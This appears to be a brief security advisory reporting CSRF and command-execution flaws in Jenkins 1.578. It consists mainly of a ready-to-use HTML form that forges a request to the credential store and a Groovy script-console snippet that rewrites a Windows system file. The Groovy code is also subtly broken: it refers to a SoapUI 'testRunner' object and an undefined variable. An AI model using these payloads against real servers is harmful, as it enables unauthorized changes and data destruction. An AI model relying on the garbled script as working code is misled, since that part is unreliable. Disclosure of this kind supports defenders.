Jenkins version 1.578 suffers from cross site request forgery and command execution vulnerabilities.
6363635fc4f8f8d1c6bf9fa96800d6fbc994b86e1aa1c70cb35bf5039f8becd3#Affected Vendor: http://jenkins-ci.org/
#Date: 03/09/2014
#Discovered by: JoeV
#Type of vulnerability: CSRF and Command Execution
#Tested on: Windows 7
#Version : 1.578
#Description: Jenkins is susceptible to CSRF attack and command
execution. Using groovy one can fire any command and get it executed
by the script console thus able to access files, registry keys, values
and folders which is outbound for Jenkins.
#CSRF
--------
#Payload:
<form method="POST" name="form0"
action="http://localhost:8090/credential-store/createDomain">
<input type="hidden" name="_.name" value="xyz"/>
<input type="hidden" name="description" value="abc"/>
<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
<input type="hidden" name="Submit" value="OK"/>
</form>
Command Execution (/script)
-------------------------------------
ArrayList pids = null
PrintWriter writer = null
File f = new File("C:/Windows/System32/Services.msc")
if (f.length() > 0){
pids = new ArrayList()
f.eachLine { line -> pids.add(line) }
println("Item to be removed: " + pids.get(0))
testRunner.testCase.setPropertyValue( "personId", pid )
pids.remove(0)
println pids
writer = new PrintWriter(f)
pids.each { id -> writer.println(id) }
writer.close()
}
else{
println "Null"
}
--
Regards,
*Joel V*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed